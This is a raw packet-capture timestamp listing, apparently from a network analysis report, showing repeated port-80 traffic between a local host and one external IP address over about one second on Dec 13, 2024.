                                                                                                                                                                                                Dec 13, 2024 08:19:05.842392921 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.842449903 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.845992088 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.846128941 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.846198082 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.849828959 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.849841118 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.849905968 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.857800961 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.857816935 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.857856989 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.857868910 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.857899904 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.857930899 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.860764980 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.860831976 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.860898972 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.968076944 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.968301058 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.968401909 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.972657919 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.972671986 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.972742081 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.974028111 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.974179983 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.974236965 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.977229118 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.977370024 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.977430105 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.980292082 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.980468988 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.980524063 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.983336926 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.983491898 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.983566999 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.986356974 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.986371040 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.986438036 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.989295006 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.989310026 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.989362001 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.991903067 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.992038012 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.992091894 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.994827032 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.995022058 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.995074987 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.996712923 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.996726036 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.996779919 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.999543905 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.999557018 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.999618053 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.002899885 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.002927065 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.002974987 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.005374908 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.005388021 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.005444050 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.007361889 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.007626057 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.007680893 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.010189056 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.010207891 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.010284901 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.013097048 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.013108969 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.013164043 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.016083956 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.016165018 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.016218901 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.021099091 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.021119118 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.021193027 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.022840977 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.022852898 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.022910118 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.025867939 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.025881052 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.025943041 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.029232025 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.029244900 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.029299974 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.030958891 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.030972958 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.031027079 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.032587051 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.032691002 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.032748938 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.035444021 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.035631895 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.035686970 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.038290977 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.038337946 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.038395882 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.041148901 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.041162968 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.041220903 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.043919086 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.043931961 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.043992996 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.046736956 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.046750069 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.046814919 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.049508095 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.049520016 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.049571991 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.052355051 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.052366972 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.052545071 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.055017948 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.055089951 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.055141926 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.057960987 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.057988882 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.058048010 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.060800076 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.060811996 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.060859919 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.063668013 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.063749075 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.063807964 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.066334009 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.066422939 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.066476107 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.069152117 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.069169044 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.069225073 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.071934938 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.071948051 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.072026968 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.074968100 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.121366978 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.161181927 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.161391973 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.161458969 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.162477970 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.162488937 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.162529945 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.164654970 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.164767981 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.164818048 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.166987896 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.167129993 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.167195082 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.169368029 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.169433117 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.169490099 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.171709061 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.171720028 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.171792030 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.174027920 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.174038887 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.174082994 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.176101923 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.176223040 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.176284075 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.178534985 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.178699970 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.178750992 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.180474997 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.180687904 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.180732965 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.182565928 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.182627916 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.182676077 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.184670925 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.184798956 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.184849024 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.186829090 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.186840057 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.186887980 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.188802958 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.188927889 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.188978910 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.190845013 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.191061020 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.191108942 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.192846060 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.192996025 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.193043947 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.194817066 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.195002079 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.195053101 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.196794033 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.196928978 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.196983099 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.198906898 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.198919058 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.198970079 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.200687885 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.200804949 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.200864077 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.202595949 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.202749014 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.202805042 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.204580069 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.204698086 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.204755068 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.206568003 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.206749916 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.206804037 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.208529949 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.208601952 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.208658934 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.210541010 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.210551977 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.210602999 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.212424994 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.212435961 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.212497950 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.214602947 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.214772940 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.214977026 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.216540098 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.216551065 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.216612101 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.218293905 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.218348980 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.218405008 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.220171928 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.220184088 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.220249891 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.222227097 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.222239017 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.222300053 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.224123955 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.224136114 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.224200010 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.226051092 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.226063013 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.226130009 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.227873087 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.227992058 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.228046894 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.229928017 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.229938984 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.229980946 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.231760025 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.231873989 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.231931925 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.233735085 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.233865023 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.233921051 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.235778093 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.235790014 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.235841990 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.237653971 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.237746000 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.237834930 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.239551067 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.239710093 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.239765882 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.241508007 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.241729021 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.241785049 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.244704962 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.244875908 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.244935036 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.245857954 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.246004105 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.246057987 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.247359037 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.247584105 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.247656107 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.251852989 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.252031088 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.252042055 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.252052069 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.252110004 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.252144098 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.253777981 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.253787994 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.253835917 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.255090952 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.255366087 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.255423069 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.257126093 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.257137060 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.257196903 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.259062052 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.259159088 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.259215117 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.261137009 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.261149883 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.261210918 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.262960911 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.262970924 CET8049761185.81.68.147192.168.2.11
